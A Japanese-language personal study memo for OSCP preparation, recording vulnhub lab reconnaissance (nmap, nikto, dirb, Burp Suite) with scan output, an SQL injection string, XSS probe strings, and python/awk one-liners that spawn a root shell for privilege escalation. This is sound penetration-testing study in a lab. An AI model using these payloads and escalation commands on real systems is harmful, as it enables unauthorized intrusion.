【備忘録】vulnhub、テクニックのmemo

次の資格はOSCPを狙う。勉強にあたりvulnhub始めたので、自分用のmemo。

偵察関連

nmapによる調査

※ネットワーク回線が遅いと、上手く結果が得られない場合がある

root@kali:~# nmap -sT -n -P0 -p 1-1023 192.168.1.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 22:56 JST
Nmap scan report for 192.168.1.123
Host is up (0.00045s latency).
Not shown: 1011 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
23/tcp  open  telnet
25/tcp  open  smtp
53/tcp  open  domain
80/tcp  open  http
111/tcp open  rpcbind
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
512/tcp open  exec
513/tcp open  login
514/tcp open  shell

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

Telnetでの確認

root@kali:~# telnet 192.168.1.123 80
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 25 Jan 2019 14:08:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html

Connection closed by foreign host.

netcatでの確認

root@kali:~# nc -nv 192.168.1.123 80
(UNKNOWN) [192.168.1.123] 80 (http) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 25 Jan 2019 14:09:04 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html

バージョンが隠されている場合、

Apache HTTP Serverのバージョンを当てる方法

https://www.mbsd.jp/blog/20170904.html

niktoによる調査

root@kali:~# nikto -host 192.168.1.123 -port 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.123
+ Target Hostname:    192.168.1.123
+ Target Port:        80
+ Start Time:         2019-01-25 23:17:43 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Wed Dec 10 02:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=OmhJkih9vL44LsY1OmPT8rY22Q3yYzofAoZYTrAvV47OLK6Ktupj3L5NXxeesPGalUL9RnCpWsMZoU7Uawqmxn7ZlylQQX0p1ySBA6CYKB9UOE9u19lqYdWvLfZJxsgJ4V0SndAdkXKA3ZK8cJKvBjHM8IWY00FIURcUQgQEgM2zKZuSUQC8wgR6JAb05Pep0
・
<中略>
・
cOHuSLwcPfW5cbbDBOPQJhX845BWb1HRH7t7OQ6WTsvNZZ5xJnj7raKaKIh5IK4LxY8OR5S28kTC6fdOpr80<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8347 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2019-01-25 23:18:22 (GMT9) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

SPARTAでtoolをまとめて実行

ftpやmysqlのデフォルトpasswordもみれる

Bruteタブからはhydraで辞書攻撃もできる。以下はリバースブルートフォース時。


ディレクトリの確認

root@kali:~# dirb http://192.168.1.3

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 26 22:58:51 2019
URL_BASE: http://192.168.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.3/ ----
==> DIRECTORY: http://192.168.1.3/admin/

webアプリケーションの脆弱性

Burp Suiteを使う。事前にFoxyProxyで127.0.0.1:8080宛の設定を入れておく。

起動したら、「Target」からIPアドレスや対象ドメインを追加する。

追加時のポップアップは”yes”を選択

「Proxy」「Options」「Intercept Client Requests」を以下のようにしておく

「Proxy」タブで通信が見えるようになったら、効率を上げるために「Send to Repeater」をクリックし、「Repeater」タブで挙動出しを繰り返す

この時、右下のテキストボックスで検索しないと、追うのがしんどい

後は ‘ OR ‘A’ = ‘ 等、頑張って入力していく。大変だけど、効いた時は嬉しい。

権限昇格

定番のpython

ted@Toppo:~$ python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root

awkでも

ted@Toppo:~$ awk '{system("/bin/sh")}'

# whoami
root